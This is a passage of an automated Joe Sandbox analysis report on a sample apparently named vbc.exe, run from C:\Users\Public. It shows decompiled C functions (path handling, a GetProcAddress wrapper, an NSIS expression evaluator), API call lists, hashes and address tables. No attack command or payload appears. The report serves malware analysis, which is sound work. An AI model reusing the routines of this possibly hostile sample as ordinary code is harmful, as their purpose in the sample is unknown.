                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp$C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll
                                                • API String ID: 3109718747-2985964299
                                                • Opcode ID: d2c789987130d99a9d8555b995c4ef7a99902a466d6c51683c5913d45da2c776
                                                • Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
                                                • Opcode Fuzzy Hash: d2c789987130d99a9d8555b995c4ef7a99902a466d6c51683c5913d45da2c776
                                                • Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E100018A9(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void* _t43;
                                                				signed int _t44;
                                                				signed int _t59;
                                                				void _t63;
                                                				signed int _t64;
                                                				signed int _t65;
                                                				signed int _t67;
                                                				signed int _t68;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				void* _t76;
                                                				void* _t77;
                                                				void* _t78;
                                                				void* _t79;
                                                				void* _t80;
                                                				signed int _t84;
                                                				signed int _t86;
                                                				signed int _t89;
                                                				void* _t100;
                                                
                                                				_t84 = __edx;
                                                				 *0x1000406c = _a8;
                                                				_t59 = 0;
                                                				 *0x10004070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E10001243();
                                                				_t89 = E10001311(_t41);
                                                				_t86 = _t84;
                                                				_t43 = E10001243();
                                                				_t63 =  *_t43;
                                                				_a8 = _t43;
                                                				if(_t63 != 0x7e && _t63 != 0x21) {
                                                					_a16 = E10001243();
                                                					_t59 = E10001311(_t56);
                                                					_v12 = _t84;
                                                					GlobalFree(_a16);
                                                					_t43 = _a8;
                                                				}
                                                				_t64 =  *_t43 & 0x0000ffff;
                                                				_t100 = _t64 - 0x2f;
                                                				if(_t100 > 0) {
                                                					_t65 = _t64 - 0x3c;
                                                					__eflags = _t65;
                                                					if(_t65 == 0) {
                                                						__eflags =  *((short*)(_t43 + 2)) - 0x3c;
                                                						if( *((short*)(_t43 + 2)) != 0x3c) {
                                                							__eflags = _t86 - _v12;
                                                							if(__eflags > 0) {
                                                								L54:
                                                								_t44 = 0;
                                                								__eflags = 0;
                                                								L55:
                                                								asm("cdq");
                                                								L56:
                                                								_t89 = _t44;
                                                								L57:
                                                								_t86 = _t84;
                                                								L58:
                                                								E10001470(_t84, _t89, _t86,  &_v76);
                                                								E10001272( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L47:
                                                								__eflags = 0;
                                                								L48:
                                                								_t44 = 1;
                                                								goto L55;
                                                							}
                                                							__eflags = _t89 - _t59;
                                                							if(_t89 < _t59) {
                                                								goto L47;
                                                							}
                                                							goto L54;
                                                						}
                                                						_t84 = _t86;
                                                						_t44 = E10002D90(_t89, _t59, _t84);
                                                						goto L56;
                                                					}
                                                					_t67 = _t65 - 1;
                                                					__eflags = _t67;
                                                					if(_t67 == 0) {
                                                						__eflags = _t89 - _t59;
                                                						if(_t89 != _t59) {
                                                							goto L54;
                                                						}
                                                						__eflags = _t86 - _v12;
                                                						if(_t86 != _v12) {
                                                							goto L54;
                                                						}
                                                						goto L47;
                                                					}
                                                					_t68 = _t67 - 1;
                                                					__eflags = _t68;
                                                					if(_t68 == 0) {
                                                						__eflags =  *((short*)(_t43 + 2)) - 0x3e;
                                                						if( *((short*)(_t43 + 2)) != 0x3e) {
                                                							__eflags = _t86 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L54;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L47;
                                                							}
                                                							__eflags = _t89 - _t59;
                                                							if(_t89 <= _t59) {
                                                								goto L54;
                                                							}
                                                							goto L47;
                                                						}
                                                						_t84 = _t86;
                                                						_t44 = E10002DB0(_t89, _t59, _t84);
                                                						goto L56;
                                                					}
                                                					_t70 = _t68 - 0x20;
                                                					__eflags = _t70;
                                                					if(_t70 == 0) {
                                                						_t89 = _t89 ^ _t59;
                                                						_t86 = _t86 ^ _v12;
                                                						goto L58;
                                                					}
                                                					_t71 = _t70 - 0x1e;
                                                					__eflags = _t71;
                                                					if(_t71 == 0) {
                                                						__eflags =  *((short*)(_t43 + 2)) - 0x7c;
                                                						if( *((short*)(_t43 + 2)) != 0x7c) {
                                                							_t89 = _t89 | _t59;
                                                							_t86 = _t86 | _v12;
                                                							goto L58;
                                                						}
                                                						__eflags = _t89 | _t86;
                                                						if((_t89 | _t86) != 0) {
                                                							goto L47;
                                                						}
                                                						__eflags = _t59 | _v12;
                                                						if((_t59 | _v12) != 0) {
                                                							goto L47;
                                                						}
                                                						goto L54;
                                                					}
                                                					__eflags = _t71 == 0;
                                                					if(_t71 == 0) {
                                                						_t89 =  !_t89;
                                                						_t86 =  !_t86;
                                                					}
                                                					goto L58;
                                                				}
                                                				if(_t100 == 0) {
                                                					L21:
                                                					__eflags = _t59 | _v12;
                                                					if((_t59 | _v12) != 0) {
                                                						_v24 = E10002C20(_t89, _t86, _t59, _v12);
                                                						_v20 = _t84;
                                                						_t89 = E10002CD0(_t89, _t86, _t59, _v12);
                                                						_t43 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t84 = _t86;
                                                					}
                                                					__eflags =  *_t43 - 0x2f;
                                                					if( *_t43 != 0x2f) {
                                                						goto L57;
                                                					} else {
                                                						_t89 = _v24;
                                                						_t86 = _v20;
                                                						goto L58;
                                                					}
                                                				}
                                                				_t76 = _t64 - 0x21;
                                                				if(_t76 == 0) {
                                                					_t44 = 0;
                                                					__eflags = _t89 | _t86;
                                                					if((_t89 | _t86) != 0) {
                                                						goto L55;
                                                					}
                                                					goto L48;
                                                				}
                                                				_t77 = _t76 - 4;
                                                				if(_t77 == 0) {
                                                					goto L21;
                                                				}
                                                				_t78 = _t77 - 1;
                                                				if(_t78 == 0) {
                                                					__eflags =  *((short*)(_t43 + 2)) - 0x26;
                                                					if( *((short*)(_t43 + 2)) != 0x26) {
                                                						_t89 = _t89 & _t59;
                                                						_t86 = _t86 & _v12;
                                                						goto L58;
                                                					}
                                                					__eflags = _t89 | _t86;
                                                					if((_t89 | _t86) == 0) {
                                                						goto L54;
                                                					}
                                                					__eflags = _t59 | _v12;
                                                					if((_t59 | _v12) == 0) {
                                                						goto L54;
                                                					}
                                                					goto L47;
                                                				}
                                                				_t79 = _t78 - 4;
                                                				if(_t79 == 0) {
                                                					_t44 = E10002BE0(_t89, _t86, _t59, _v12);
                                                					goto L56;
                                                				} else {
                                                					_t80 = _t79 - 1;
                                                					if(_t80 == 0) {
                                                						_t89 = _t89 + _t59;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t80 == 0) {
                                                							_t89 = _t89 - _t59;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L58;
                                                				}
                                                			}



























                                                0x100018a9
                                                0x100018b3
                                                0x100018bc
                                                0x100018bf
                                                0x100018c4
                                                0x100018cd
                                                0x100018d6
                                                0x100018d8
                                                0x100018da
                                                0x100018df
                                                0x100018e2
                                                0x100018e9
                                                0x100018f7
                                                0x10001900
                                                0x10001905
                                                0x10001908
                                                0x1000190e
                                                0x1000190e
                                                0x10001911
                                                0x10001914
                                                0x10001917
                                                0x100019df
                                                0x100019df
                                                0x100019e2
                                                0x10001a4d
                                                0x10001a52
                                                0x10001a61
                                                0x10001a64
                                                0x10001a6c
                                                0x10001a6c
                                                0x10001a6c
                                                0x10001a6e
                                                0x10001a6e
                                                0x10001a6f
                                                0x10001a6f
                                                0x10001a71
                                                0x10001a71
                                                0x10001a73
                                                0x10001a79
                                                0x10001a82
                                                0x10001a93
                                                0x10001a9e
                                                0x10001a9e
                                                0x10001a66
                                                0x10001a48
                                                0x10001a48
                                                0x10001a4a
                                                0x10001a4a
                                                0x00000000
                                                0x10001a4a
                                                0x10001a68
                                                0x10001a6a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a6a
                                                0x10001a56
                                                0x10001a5a
                                                0x00000000
                                                0x10001a5a
                                                0x100019e4
                                                0x100019e4
                                                0x100019e5
                                                0x10001a3f
                                                0x10001a41
                                                0x00000000
                                                0x00000000
                                                0x10001a43
                                                0x10001a46
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a46
                                                0x100019e7
                                                0x100019e7
                                                0x100019e8
                                                0x10001a1e
                                                0x10001a23
                                                0x10001a32
                                                0x10001a35
                                                0x00000000
                                                0x00000000
                                                0x10001a37
                                                0x00000000
                                                0x00000000
                                                0x10001a39
                                                0x10001a3b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a3d
                                                0x10001a27
                                                0x10001a2b
                                                0x00000000
                                                0x10001a2b
                                                0x100019ea
                                                0x100019ea
                                                0x100019ed
                                                0x10001a17
                                                0x10001a19
                                                0x00000000
                                                0x10001a19
                                                0x100019ef
                                                0x100019ef
                                                0x100019f2
                                                0x100019fe
                                                0x10001a03
                                                0x10001a10
                                                0x10001a12
                                                0x00000000
                                                0x10001a12
                                                0x10001a05
                                                0x10001a07
                                                0x00000000
                                                0x00000000
                                                0x10001a09
                                                0x10001a0c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a0e
                                                0x100019f5
                                                0x100019f6
                                                0x100019f8
                                                0x100019fa
                                                0x100019fa
                                                0x00000000
                                                0x100019f6
                                                0x1000191d
                                                0x10001996
                                                0x10001998
                                                0x1000199b
                                                0x100019b7
                                                0x100019ba
                                                0x100019c5
                                                0x100019c7
                                                0x1000199d
                                                0x1000199d
                                                0x100019a1
                                                0x100019a5
                                                0x100019a5
                                                0x100019ca
                                                0x100019ce
                                                0x00000000
                                                0x100019d4
                                                0x100019d4
                                                0x100019d7
                                                0x00000000
                                                0x100019d7
                                                0x100019ce
                                                0x1000191f
                                                0x10001922
                                                0x10001987
                                                0x10001989
                                                0x1000198b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001991
                                                0x10001924
                                                0x10001927
                                                0x00000000
                                                0x00000000
                                                0x10001929
                                                0x1000192a
                                                0x10001960
                                                0x10001965
                                                0x1000197d
                                                0x1000197f
                                                0x00000000
                                                0x1000197f
                                                0x10001967
                                                0x10001969
                                                0x00000000
                                                0x00000000
                                                0x1000196f
                                                0x10001972
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001978
                                                0x1000192c
                                                0x1000192f
                                                0x10001956
                                                0x00000000
                                                0x10001931
                                                0x10001931
                                                0x10001932
                                                0x10001946
                                                0x10001948
                                                0x10001934
                                                0x10001936
                                                0x1000193c
                                                0x1000193e
                                                0x1000193e
                                                0x10001936
                                                0x00000000
                                                0x10001932

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10);
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x10001619
                                                0x10001625
                                                0x10001632
                                                0x10001639
                                                0x10001642
                                                0x1000164e

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                • GetProcAddress.KERNEL32(10002148,00000000,?,00000000,10002148,?,00000808), ref: 10001639
                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00405BC6(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}




                                                0x00405bc7
                                                0x00405bd4
                                                0x00405bd5
                                                0x00405be0
                                                0x00405be8
                                                0x00405be8
                                                0x00405bf0

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
                                                • CharPrevW.USER32(?,00000000), ref: 00405BD6
                                                • lstrcatW.KERNEL32 ref: 00405BE8
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4017390910
                                                • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                • Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
                                                • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                • Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403D31(void* __ecx, void* __eflags) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed short _t6;
                                                				intOrPtr _t11;
                                                				signed int _t13;
                                                				signed int _t16;
                                                				signed short* _t18;
                                                				signed int _t20;
                                                				signed short* _t23;
                                                				intOrPtr _t25;
                                                				signed int _t26;
                                                				intOrPtr* _t27;
                                                
                                                				_t24 = L"1033";
                                                				_t13 = 0xffff;
                                                				_t6 = E00406172(__ecx, L"1033");
                                                				while(1) {
                                                					_t26 =  *0x42a284;
                                                					if(_t26 == 0) {
                                                						goto L7;
                                                					}
                                                					_t16 =  *( *0x42a250 + 0x64);
                                                					_t20 =  ~_t16;
                                                					_t18 = _t16 * _t26 +  *0x42a280;
                                                					while(1) {
                                                						_t18 = _t18 + _t20;
                                                						_t26 = _t26 - 1;
                                                						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                							break;
                                                						}
                                                						if(_t26 != 0) {
                                                							continue;
                                                						}
                                                						goto L7;
                                                					}
                                                					 *0x429220 = _t18[1];
                                                					 *0x42a2e8 = _t18[3];
                                                					_t23 =  &(_t18[5]);
                                                					if(_t23 != 0) {
                                                						 *0x42921c = _t23;
                                                						E00406159(_t24,  *_t18 & 0x0000ffff);
                                                						SetWindowTextW( *0x423708, E00406234(_t13, _t24, _t26, 0x429240, 0xfffffffe));
                                                						_t11 =  *0x42a26c;
                                                						_t27 =  *0x42a268;
                                                						if(_t11 == 0) {
                                                							L15:
                                                							return _t11;
                                                						}
                                                						_t25 = _t11;
                                                						do {
                                                							_t11 =  *_t27;
                                                							if(_t11 != 0) {
                                                								_t11 = E00406234(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                							}
                                                							_t27 = _t27 + 0x818;
                                                							_t25 = _t25 - 1;
                                                						} while (_t25 != 0);
                                                						goto L15;
                                                					}
                                                					L7:
                                                					if(_t13 != 0xffff) {
                                                						_t13 = 0;
                                                					} else {
                                                						_t13 = 0x3ff;
                                                					}
                                                				}
                                                			}
















                                                0x00403d35
                                                0x00403d3a
                                                0x00403d40
                                                0x00403d45
                                                0x00403d45
                                                0x00403d4d
                                                0x00000000
                                                0x00000000
                                                0x00403d55
                                                0x00403d5d
                                                0x00403d5f
                                                0x00403d65
                                                0x00403d65
                                                0x00403d67
                                                0x00403d73
                                                0x00000000
                                                0x00000000
                                                0x00403d77
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403d79
                                                0x00403d7e
                                                0x00403d87
                                                0x00403d8d
                                                0x00403d92
                                                0x00403da6
                                                0x00403db1
                                                0x00403dc9
                                                0x00403dcf
                                                0x00403dd4
                                                0x00403ddc
                                                0x00403dfd
                                                0x00403dfd
                                                0x00403dfd
                                                0x00403dde
                                                0x00403de0
                                                0x00403de0
                                                0x00403de4
                                                0x00403deb
                                                0x00403deb
                                                0x00403df0
                                                0x00403df6
                                                0x00403df6
                                                0x00000000
                                                0x00403de0
                                                0x00403d94
                                                0x00403d99
                                                0x00403da2
                                                0x00403d9b
                                                0x00403d9b
                                                0x00403d9b
                                                0x00403d99

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: "C:\Users\Public\vbc.exe" $1033
                                                • API String ID: 530164218-2130053295
                                                • Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                • Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
                                                • Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                • Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405CCE(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E00406212(0x425f30, _a4);
                                                				_t21 = E00405C71(0x425f30);
                                                				if(_t21 != 0) {
                                                					E004064A6(_t21);
                                                					if(( *0x42a258 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x425f30 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x425f30);
                                                							_push(0x425f30);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E00406555();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405C12(0x425f30);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405BC6();
                                                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}








                                                0x00405cda
                                                0x00405ce5
                                                0x00405ce9
                                                0x00405cf0
                                                0x00405cfc
                                                0x00405d0c
                                                0x00405d0e
                                                0x00405d26
                                                0x00405d27
                                                0x00405d2e
                                                0x00405d2f
                                                0x00000000
                                                0x00000000
                                                0x00405d12
                                                0x00405d19
                                                0x00405d21
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d19
                                                0x00405d31
                                                0x00000000
                                                0x00405d45
                                                0x00405cfe
                                                0x00405d04
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d04
                                                0x00405ceb
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(?), ref: 00405C7F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,7556D4C4,?,755513E0,00405A23,?,7556D4C4,755513E0,00000000), ref: 00405D27
                                                • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,7556D4C4,?,755513E0,00405A23,?,7556D4C4,755513E0), ref: 00405D37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: 0_B
                                                • API String ID: 3248276644-2128305573
                                                • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
                                                • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00405C12(WCHAR* _a4) {
                                                				WCHAR* _t5;
                                                				WCHAR* _t7;
                                                
                                                				_t7 = _a4;
                                                				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                				while( *_t5 != 0x5c) {
                                                					_push(_t5);
                                                					_push(_t7);
                                                					_t5 = CharPrevW();
                                                					if(_t5 > _t7) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				 *_t5 =  *_t5 & 0x00000000;
                                                				return  &(_t5[1]);
                                                			}





                                                0x00405c13
                                                0x00405c1d
                                                0x00405c20
                                                0x00405c26
                                                0x00405c27
                                                0x00405c28
                                                0x00405c30
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c30
                                                0x00405c32
                                                0x00405c3a

                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\Public,00402F41,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003), ref: 00405C18
                                                • CharPrevW.USER32(80000000,00000000), ref: 00405C28
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\Public
                                                • API String ID: 2709904686-2272764151
